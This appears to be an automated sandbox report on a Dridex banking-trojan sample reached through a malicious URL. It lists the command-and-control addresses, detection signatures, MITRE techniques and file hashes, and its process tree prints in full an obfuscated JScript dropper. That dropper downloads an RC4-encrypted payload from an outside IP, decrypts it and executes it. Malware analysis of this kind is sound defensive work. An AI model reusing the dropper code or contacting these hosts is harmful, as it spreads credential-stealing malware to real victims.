Analysis

  • max time kernel
    241s
  • max time network
    250s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-06-2021 13:16

General

  • Target

    https://exitmagall.xyz/iduew73

  • Sample

    210611-9qr8m4rems

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

91.200.186.229:19226

91.191.172.124:13783

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex (known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew73
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:672
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:672 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1876
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.107.144/?MjU5NzQ4&fepsLcMVF&s2hdfgdfgt4=6NbP03YA0SD2Izfz-3ORZ3xOWPPk7HPRAOzrlyCegyC8_Auf7dVPwDnjUKHfwcyzYkPUVgSpKCsj0DTmBGdgpWCq0CNUQhE-KLIVLM46A&oafghc1n4=w33QMvXcJx3QFYPJKfncT&end=cars&start=why&yus=73uball.114al73.406i8h2w7&QfIGMTk0MTY=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.107.144/?MjU5NzQ4&fepsLcMVF&s2hdfgdfgt4=6NbP03YA0SD2Izfz-3ORZ3xOWPPk7HPRAOzrlyCegyC8_Auf7dVPwDnjUKHfwcyzYkPUVgSpKCsj0DTmBGdgpWCq0CNUQhE-KLIVLM46A&oafghc1n4=w33QMvXcJx3QFYPJKfncT&end=cars&start=why&yus=73uball.114al73.406i8h2w7&QfIGMTk0MTY=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:2480
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c r437f.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3880
            • C:\Users\Admin\AppData\Local\Temp\r437f.exe
              r437f.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:3084

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion: Modify Registry (1) T1112
  • Discovery: Query Registry (1) T1012
  • Discovery: System Information Discovery (2) T1082


Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    66e0a7c9b93a12e042f3d12e877443ba

    SHA1

    6c7d578b1c81595c64fa76c787228e7000572f6c

    SHA256

    80a2f7ce91f8fbd0c434679d8727b702b7829082298c872cba8a3aeca4ba91b7

    SHA512

    46fff32727988796daf825772043e2aaad9775fde03c4d00d80f92f69b3cc5e466fc94f2eb9197e2685439cbae3d845a6cbb999756533a36e4983f7a8491ebc6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    9033c21d07cc9ea27f60b54173f06b85

    SHA1

    41882568733f4c8c8db97209ff0b026f3e9e0239

    SHA256

    a8e88ba91e3c6db2caf7dce05072e529174e9904f64dada92c8339f0c3305e12

    SHA512

    7a590377185088ec6ee632b11004e92aa61b3f95bc47cdb88b1a11c4163ee93979d528bdd629003ab45ed41eefa73ad965bc4e83661f517456a04b42169388eb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\G2YMFG32.cookie
    MD5

    c5a202fb2149ab569a03b26eae238b58

    SHA1

    071a2e45a0046e51272374082ce435c48caf49d7

    SHA256

    2feff3d84a8bddbd7e91bfda1f2a9eadc8c19a467a89b18fe34eedd2727d2757

    SHA512

    95e24b5bfc846c316b59a54c9d00a31a9ea943f9b669969ae5e8bf6bc345db0a49dbd55c0d07ae9208b6714bc91b7c030bb5c3c44602f69924e5b371aee79ad3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\U41AKJKH.cookie
    MD5

    67c344ac5ab2b6ad7c8139840fcf26b2

    SHA1

    4ebb71891042ca2691a53fc5be26c09e3d9be412

    SHA256

    c91f041fdf2fb13e781d06f975b5110f9059de92b0d0e0eee6f838ce02d2eb2e

    SHA512

    41d355f39f503b78a852d044b809694d64b24e9b1bb385403e23b11ba72cff285e763c2739fdb1054b6e9a3e0d338330bd768b35dbbb3b0f16c32358c8c61164

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\r437f.exe
    MD5

    4ec7ddfd82f4a621daade04123f4fda7

    SHA1

    dd7fa496a792e5efa4c96cc26aa5d6b2f7fda5b6

    SHA256

    ad8de0ffe7a79bd5a1bb949080ac4a20951944683b66ccf0547cca7dee96824c

    SHA512

    2124645a7e7aff5ad55315e17b99fdd9cdd3f239aba19aaa54c5547e099da9fe4090067620d2b5abcc17634d09b9754b02ddff700c22c5cb96451c243507cf56

  • memory/672-114-0x00007FF8E4290000-0x00007FF8E42FB000-memory.dmp
    Filesize

    428KB

  • memory/1876-115-0x0000000000000000-mapping.dmp
  • memory/2264-116-0x0000000000000000-mapping.dmp
  • memory/2480-117-0x0000000000000000-mapping.dmp
  • memory/3084-120-0x0000000000000000-mapping.dmp
  • memory/3084-124-0x0000000000400000-0x0000000000595000-memory.dmp
    Filesize

    1.6MB

  • memory/3084-123-0x00000000006D0000-0x000000000081A000-memory.dmp
    Filesize

    1.3MB

  • memory/3880-119-0x0000000000000000-mapping.dmp